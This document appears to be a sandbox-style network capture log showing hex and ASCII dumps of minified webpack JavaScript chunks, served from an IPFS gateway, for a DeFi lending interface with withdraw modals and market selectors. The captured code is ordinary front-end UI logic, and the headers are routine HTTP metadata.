                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 39 37 37 5d 2c 7b 37 35 31 35 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 64 28 72 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 36 33 33 36 36 29 2c 61 3d 74 28 38 37 34 36 32 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 38 36 30 31 30 29 2c 69 3d 74 28 39 34 37 38 30 29 2c 63 3d 74 28 34 31 37 39 36 29 2c 75 3d 74 28 33 37 37 34 33 29 2c 6c 3d 74 28 35 34 32 33 35 29 2c 64 3d 74 28 38 35 38 39 33 29 2c 70 3d 28 30 2c 6c 2e 5a 29 28 28 30 2c 64 2e 6a 73 78 29 28 22
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{75158:function(e,r,t){t.d(r,{Z:function(){return k}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 22 64 65 66 61 75 6c 74 22 3d 3d 3d 72 2e 63 6f 6c 6f 72 3f 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 43 68 61 6e 6e 65 6c 3a 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 63 2e 46 71 29 28 22 64 65 66 61 75 6c 74 22 3d 3d 3d 72 2e 63 6f 6c 6f 72 3f 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 3a 65 2e 70 61 6c 65 74 74 65 5b 72 2e 63 6f 6c 6f 72 5d 2e 6d 61 69 6e 2c 65 2e 70 61 6c 65
                                                                                                                                                                                                                                                  Data Ascii: over":{backgroundColor:e.vars?`rgba(${"default"===r.color?e.vars.palette.action.activeChannel:e.vars.palette.primary.mainChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,c.Fq)("default"===r.color?e.palette.action.active:e.palette[r.color].main,e.pale
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 61 3d 74 28 38 31 37 31 39 29 2c 6f 3d 74 28 38 37 30 35 34 29 2c 73 3d 28 74 28 36 37 32 39 34 29 2c 74 28 38 35 38 39 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 72 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72
                                                                                                                                                                                                                                                  Data Ascii: unction(){return p}});var n=t(59499),a=t(81719),o=t(87054),s=(t(67294),t(85893));function i(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 73 65 6c 65 63 74 65 64 3a 68 6f 76 65 72 22 3a 7b 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 72 2e 70 61 6c 65 74 74 65 2e 6f 74 68 65 72 2e 73 74 61 6e 64 61 72 64 49 6e 70 75 74 4c 69 6e 65 29 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 46 46 46 46 46 46 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 22 7d 2c 22 26 2e 4d 75 69 2d 73 65 6c 65 63 74 65 64 2c 20 26 2e 4d 75 69 2d 64 69 73 61 62 6c 65 64 22 3a 7b 7a 49 6e 64 65 78 3a 31 30 30 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 6f 6c 6f 72 3a 72 2e 70 61 6c 65 74 74 65 2e 62 61 63 6b 67
                                                                                                                                                                                                                                                  Data Ascii: selected:hover":{border:"1px solid ".concat(r.palette.other.standardInputLine),backgroundColor:"#FFFFFF",borderRadius:"4px !important"},"&.Mui-selected, &.Mui-disabled":{zIndex:100,height:"100%",display:"flex",justifyContent:"center",color:r.palette.backg
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 73 78 29 28 75 2c 63 28 7b 7d 2c 65 29 29 7d 7d 2c 39 36 30 34 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 57 69 74 68 64 72 61 77 4d 6f 64 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 65 7d 7d 29 3b 76 61 72 20 6e 3d 74 28 35 39 34 39 39 29 2c 61 3d 74 28 34 39 35 30 31 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 73 3d 74 28 34 37 31 33 30 29 2c 69 3d 74 28 37 33 39 36 35 29 2c 63 3d 74 28 38 31 39 35 29 2c 75 3d 74 28 34 36 39 33 30 29 2c 6c 3d 74 28 36 39 31 32 35 29 2c 64 3d 74 28 36 33 32 30 36 29 2c 70 3d 74 28 33 31 39 35 39 29 2c 6d 3d 74 28 39 34 36 33 35 29 2c 68 3d 74 28 39 30 31 31 36 29 2c 66 3d 74 28 31 32 37 39 29 3b 76 61 72 20 76 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28
                                                                                                                                                                                                                                                  Data Ascii: sx)(u,c({},e))}},96046:function(e,r,t){t.r(r),t.d(r,{WithdrawModal:function(){return We}});var n=t(59499),a=t(49501),o=t(67294),s=t(47130),i=t(73965),c=t(8195),u=t(46930),l=t(69125),d=t(63206),p=t(31959),m=t(94635),h=t(90116),f=t(1279);var v=o.forwardRef(
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 28 22 30 22 29 26 26 28 73 3d 63 2e 6d 75 6c 74 69 70 6c 69 65 64 42 79 28 65 2e 74 6f 74 61 6c 42 6f 72 72 6f 77 73 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 2e 64 69 76 28 69 29 29 2c 6f 3d 5a 2e 5a 2e 6d 69 6e 28 6f 2c 73 2e 64 69 76 69 64 65 64 42 79 28 74 2e 66 6f 72 6d 61 74 74 65 64 50 72 69 63 65 49 6e 4d 61 72 6b 65 74 52 65 66 65 72 65 6e 63 65 43 75 72 72 65 6e 63 79 29 29 7d 72 65 74 75 72 6e 20 6f 7d 2c 55 3d 74 28 35 30 30 32 39 29 2c 71 3d 74 28 31 37 36 37 34 29 2c 46 3d 74 28 38 37 37 39 34 29 2c 59 3d 74 2e 6e 28 46 29 2c 7a 3d 74 28 37 35 33 33 31 29 2c 47 3d 74 28 32 34 32 34 33 29 2c 56 3d 74 28 38 30 38 35 34 29 2c 51 3d 74 28 38 35 39 34 35 29 2c 4b 3d 74 28 35 36 33 37 31 29 2c 24 3d 74 28 38 39 32 39
                                                                                                                                                                                                                                                  Data Ascii: ("0")&&(s=c.multipliedBy(e.totalBorrowsMarketReferenceCurrency).div(i)),o=Z.Z.min(o,s.dividedBy(t.formattedPriceInMarketReferenceCurrency))}return o},U=t(50029),q=t(17674),F=t(87794),Y=t.n(F),z=t(75331),G=t(24243),V=t(80854),Q=t(85945),K=t(56371),$=t(8929
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 36 5d 2c 54 3d 66 5b 37 5d 2c 53 3d 66 5b 38 5d 2c 4f 3d 66 5b 39 5d 2c 6a 3d 28 30 2c 63 2e 76 52 29 28 29 2c 43 3d 6a 2e 61 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 49 3d 6a 2e 6d 61 69 6e 54 78 53 74 61 74 65 2c 52 3d 6a 2e 6c 6f 61 64 69 6e 67 54 78 6e 73 2c 44 3d 6a 2e 73 65 74 4d 61 69 6e 54 78 53 74 61 74 65 2c 5f 3d 6a 2e 73 65 74 54 78 45 72 72 6f 72 2c 4d 3d 6a 2e 73 65 74 47 61 73 4c 69 6d 69 74 2c 48 3d 6a 2e 73 65 74 4c 6f 61 64 69 6e 67 54 78 6e 73 2c 4e 3d 6a 2e 73 65 74 41 70 70 72 6f 76 61 6c 54 78 53 74 61 74 65 2c 5a 3d 28 30 2c 45 2e 5a 29 28 29 2c 42 3d 5a 2e 73 65 6e 64 54 78 2c 46 3d 5a 2e 73 69 67 6e 54 78 44 61 74 61 2c 6e 65 3d 28 30 2c 51 2e 4e 4c 29 28 29 2c 6f 65 3d 28 30 2c 6f 2e 75 73 65 53 74 61 74 65 29 28 76 6f 69 64
                                                                                                                                                                                                                                                  Data Ascii: 6],T=f[7],S=f[8],O=f[9],j=(0,c.vR)(),C=j.approvalTxState,I=j.mainTxState,R=j.loadingTxns,D=j.setMainTxState,_=j.setTxError,M=j.setGasLimit,H=j.setLoadingTxns,N=j.setApprovalTxState,Z=(0,E.Z)(),B=Z.sendTx,F=Z.signTxData,ne=(0,Q.NL)(),oe=(0,o.useState)(void
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 74 72 69 6e 67 28 29 7d 29 2c 65 2e 6e 65 78 74 3d 32 36 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 30 3a 65 2e 70 72 65 76 3d 32 30 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 30 29 2c 63 3d 28 30 2c 4a 2e 57 47 29 28 65 2e 74 30 2c 4a 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 5f 28 63 29 2c 44 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 2c 4f 28 50 2e 76 68 2e 54 52 41 4e 53 41 43 54 49 4f 4e 5f 45 52 52 4f 52 2c 7b 74 72 61 6e 73 61 63 74 69 6f 6e 74 79 70 65 3a 7a 2e 55 51 2e 77 69 74 68 64 72 61 77 41 6e 64 53 77 69 74 63 68 2c 61 73 73 65 74 3a 69 2e 75 6e 64 65 72 6c 79 69 6e 67 41 73 73 65 74 2c 61 73 73 65 74 4e 61 6d 65 3a 69 2e 6e 61 6d 65 2c 65 72 72 6f 72 3a 65 2e 74 30 7d 29 3b 63
                                                                                                                                                                                                                                                  Data Ascii: tring()}),e.next=26;break;case 20:e.prev=20,e.t0=e.catch(0),c=(0,J.WG)(e.t0,J.aD.GAS_ESTIMATION,!1),_(c),D({txHash:void 0,loading:!1}),O(P.vh.TRANSACTION_ERROR,{transactiontype:z.UQ.withdrawAndSwitch,asset:i.underlyingAsset,assetName:i.name,error:e.t0});c
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2e 6e 65 78 74 3d 33 37 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 32 3a 65 2e 70 72 65 76 3d 33 32 2c 65 2e 74 30 3d 65 2e 63 61 74 63 68 28 32 29 2c 64 3d 28 30 2c 4a 2e 57 47 29 28 65 2e 74 30 2c 4a 2e 61 44 2e 47 41 53 5f 45 53 54 49 4d 41 54 49 4f 4e 2c 21 31 29 2c 5f 28 64 29 2c 43 2e 73 75 63 63 65 73 73 7c 7c 4e 28 7b 74 78 48 61 73 68 3a 76 6f 69 64 20 30 2c 6c 6f 61 64 69 6e 67 3a 21 31 7d 29 3b 63 61 73 65 20 33 37 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 65 2e 73 74 6f 70 28 29 7d 7d 29 2c 65 2c 6e 75 6c 6c 2c 5b 5b 32 2c 33 32 5d 5d 29 7d 29 29 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 28 29 2c 66 65 3d 28 30 2c 6f 2e 75
                                                                                                                                                                                                                                                  Data Ascii: .next=37;break;case 32:e.prev=32,e.t0=e.catch(2),d=(0,J.WG)(e.t0,J.aD.GAS_ESTIMATION,!1),_(d),C.success||N({txHash:void 0,loading:!1});case 37:case"end":return e.stop()}}),e,null,[[2,32]])})));return function(){return e.apply(this,arguments)}}(),fe=(0,o.u


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  44192.168.2.549757209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC739OUTGET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 304311
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8806.6223602df2ea965f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028477
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 39 62 38 65 34 32 31 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41b9b8e421b-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 30 36 5d 2c 7b 32 35 35 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 73 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6f 2e 64 28 73 2c 7b 68 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 2c 67 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 7d 2c 74 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 7d 7d 29 3b 76 61 72 20 61 3d 6f 28 35 39 34 39 39 29 2c 6e 3d 6f 28 34 39 35 30 31 29 2c 64 3d 6f 28 36 31 37 38 32 29 2c 74 3d 6f 28 33 30 31 32 30 29 2c 63 3d 6f 28 37 32 33 38 39 29 2c 69 3d 6f 28 36 32 30 39 37 29 2c 72 3d 6f 28 36
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{25563:function(e,s,o){"use strict";o.d(s,{hu:function(){return k},gO:function(){return R},tF:function(){return U}});var a=o(59499),n=o(49501),d=o(61782),t=o(30120),c=o(72389),i=o(62097),r=o(6
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2e 73 78 3b 72 65 74 75 72 6e 28 30 2c 49 2e 6a 73 78 73 29 28 74 2e 5a 2c 7b 73 78 3a 75 28 7b 6d 72 3a 32 2c 77 69 64 74 68 3a 73 2c 68 65 69 67 68 74 3a 73 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 6e 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 6f 2c 61 6c 74 3a 22 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 29 2c 61 26 26 28 30 2c 49 2e 6a 73 78 29 28 63 2e 5a 2c 7b 74 69 74 6c 65 3a 61 2c 61 72 72 6f 77 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 49 2e 6a 73 78 29 28 74 2e 5a 2c 7b 73 78 3a 7b 62 67 63 6f 6c 6f 72 3a 22 23 32 39 42 36 46 36 22 2c 77 69 64 74 68 3a 22 31 36 70 78 22 2c 68 65 69 67 68 74 3a 22 31 36 70 78 22 2c
                                                                                                                                                                                                                                                  Data Ascii: .sx;return(0,I.jsxs)(t.Z,{sx:u({mr:2,width:s,height:s,position:"relative"},n),children:[(0,I.jsx)("img",{src:o,alt:"",width:"100%",height:"100%"}),a&&(0,I.jsx)(c.Z,{title:a,arrow:!0,children:(0,I.jsx)(t.Z,{sx:{bgcolor:"#29B6F6",width:"16px",height:"16px",
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 52 2c 7b 73 69 7a 65 3a 77 3f 33 32 3a 32 38 2c 6c 6f 67 6f 3a 61 2e 6e 65 74 77 6f 72 6b 4c 6f 67 6f 50 61 74 68 2c 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 3a 79 28 6f 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 7d 29 2c 28 30 2c 49 2e 6a 73 78 73 29 28 74 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 31 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 73 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 77 3f 22 64 69 73 70 6c 61 79 31 22 3a 22 68 31 22 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 76 3f 22 31 2e 35 35 72 65
                                                                                                                                                                                                                                                  Data Ascii: "},children:[(0,I.jsx)(R,{size:w?32:28,logo:a.networkLogoPath,testChainName:y(o.marketTitle).testChainName}),(0,I.jsxs)(t.Z,{sx:{mr:1,display:"inline-flex",alignItems:"flex-start"},children:[(0,I.jsxs)(l.Z,{variant:w?"display1":"h1",sx:{fontSize:v?"1.55re
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 33 36 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 55 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d 61 69 6e 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 22 64 61 72 6b 22 3d 3d 3d 55 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 72 67 62 61 28 32 33 35 2c 20 32 33 35 2c 20 32 33 37 2c 20 30 2e 31 32 29 22 3a 22 23 31 42 32 30 33 30 22 29 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 36 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 31 36 70 78 22 2c 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 3a 22 31 32 70 78 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 44 2e 5a 2c 7b 76 61 6c 75 65 3a 42 2e 56 33 2c 22 64 61 74
                                                                                                                                                                                                                                                  Data Ascii: 100%",height:"36px",background:U.palette.primary.main,border:"1px solid ".concat("dark"===U.palette.mode?"rgba(235, 235, 237, 0.12)":"#1B2030"),borderRadius:"6px",marginTop:"16px",marginBottom:"12px",padding:"2px"},children:[(0,I.jsx)(D.Z,{value:B.V3,"dat
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 20 73 3d 6b 28 65 29 2c 6f 3d 73 2e 6d 61 72 6b 65 74 2c 61 3d 73 2e 6e 65 74 77 6f 72 6b 2c 6e 3d 79 28 6f 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 3b 72 65 74 75 72 6e 28 30 2c 49 2e 6a 73 78 73 29 28 67 2e 5a 2c 7b 22 64 61 74 61 2d 63 79 22 3a 22 6d 61 72 6b 65 74 53 65 6c 65 63 74 6f 72 5f 22 2e 63 6f 6e 63 61 74 28 65 29 2c 76 61 6c 75 65 3a 65 2c 73 78 3a 7b 22 2e 4d 75 69 4c 69 73 74 49 74 65 6d 49 63 6f 6e 2d 72 6f 6f 74 22 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 7d 2c 64 69 73 70 6c 61 79 3a 6f 2e 76 33 26 26 63 3d 3d 3d 42 2e 56 32 7c 7c 21 6f 2e 76 33 26 26 63 3d 3d 3d 42 2e 56 33 3f 22 6e 6f 6e 65 22 3a 22 66 6c 65 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 52 2c 7b 73 69 7a 65 3a 33 32 2c 6c 6f 67 6f
                                                                                                                                                                                                                                                  Data Ascii: s=k(e),o=s.market,a=s.network,n=y(o.marketTitle);return(0,I.jsxs)(g.Z,{"data-cy":"marketSelector_".concat(e),value:e,sx:{".MuiListItemIcon-root":{minWidth:"unset"},display:o.v3&&c===B.V2||!o.v3&&c===B.V3?"none":"flex"},children:[(0,I.jsx)(R,{size:32,logo
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 28 30 2c 61 2e 5a 29 28 65 2c 73 2c 6f 5b 73 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6f 29 29 3a 66 28 4f 62 6a 65 63 74 28 6f 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 73 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 73 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65
                                                                                                                                                                                                                                                  Data Ascii: ((function(s){(0,a.Z)(e,s,o[s])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):f(Object(o)).forEach((function(s){Object.defineProperty(e,s,Object.getOwnPropertyDescriptor(o,s))}))}return e}({display:"fle
